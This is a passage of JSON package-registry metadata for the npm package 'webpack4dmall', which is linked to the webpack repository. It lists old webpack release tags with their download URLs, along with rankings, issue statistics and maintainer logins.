k%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-15T12:14:28.960Z","dependent_packages_count":0,"downloads":2,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":24.100466736512292,"dependent_repos_count":10.295976646711454,"dependent_packages_count":51.836728746128266,"stargazers_count":0.07800884455036095,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":17.34078850626711},"purl":"pkg:npm/webpack4dmall","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack4dmall","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack4dmall","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack4dmall/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-15T00:33:00.468Z","issues_count":10162,"pull_requests_count":9346,"avg_time_to_close_issue":10799871.641803114,"avg_time_to_close_pull_request":2735107.9374077017,"issues_closed_count":9894,"pull_requests_closed_count":8803,"pull_request_authors_count":1440,"issue_authors_count":6683,"avg_comments_per_issue":5.833989372170833,"avg_comments_per_pull_request":3.1409158998502034,"merged_pull_requests_count":5955,"bot_issues_count":8,"bot_pull_requests_count":2902,"past_year_issues_count":82,"past_year_pull_requests_count":870,"past_year_avg_time_to_close_issue":883593.0892857143,"past_year_avg_time_to_close_pull_request":415674.9065281899,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":674,"past_year_pull_request_authors_count":78,"past_year_issue_authors_count":64,"past_year_avg_comments_per_issue":3.24390243902439,"past_year_avg_comments_per_pull_request":4.531034482758621,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":134,"past_year_merged_pull_requests_count":531,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1025,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":121,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":389,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":81,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4dmall/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack4dmall/version_numbers","latest_version_url":"https://packages.e